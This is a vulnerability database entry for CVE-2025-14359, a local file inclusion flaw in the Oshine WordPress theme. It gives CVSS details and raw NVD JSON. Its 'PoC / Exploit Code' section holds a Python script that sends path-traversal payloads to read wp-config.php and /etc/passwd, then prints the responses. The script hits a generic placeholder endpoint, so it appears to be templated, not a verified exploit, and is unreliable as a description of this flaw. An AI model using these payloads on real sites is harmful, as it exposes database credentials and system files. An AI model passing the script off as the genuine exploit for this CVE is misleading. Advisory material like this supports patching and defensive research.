Security Vulnerability Report
中文
CVE-2025-14359 CVSS 8.1 HIGH

CVE-2025-14359

Published: 2026-01-08 10:15:46
Last Modified: 2026-04-29 12:16:17

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in brandexponents Oshine allows PHP Local File Inclusion. This issue affects Oshine: from n/a before 7.3.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Oshine < 7.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14359 Oshine Theme LFI PoC import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # Read wp-config.php payloads = [ '../../../../../../wp-config.php', '../../../../../../etc/passwd', '../../../../../../../../etc/passwd', '....//....//....//....//wp-config.php' ] for payload in payloads: url = f"{target}/wp-content/themes/oshine/vulnerable_endpoint?file={payload}" try: r = requests.get(url, timeout=10) if r.status_code == 200: print(f'[+] Payload: {payload}') print(r.text[:500]) print('---') except Exception as e: print(f'[-] Error: {e}')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14359", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:45.920", "lastModified": "2026-04-29T12:16:17.263", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in brandexponents Oshine allows PHP Local File Inclusion.\n\nThis issue affects Oshine: from n/a before 7.3.0."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración Include/Require en un programa PHP (vulnerabilidad de 'inclusión remota de ficheros PHP') en brandexponents Oshine oshin permite la inclusión local de ficheros PHP. Este problema afecta a Oshine: desde n/a hasta &lt;= 7.2.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/theme/oshin/vulnerability/wordpress-oshine-theme-7-2-7-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}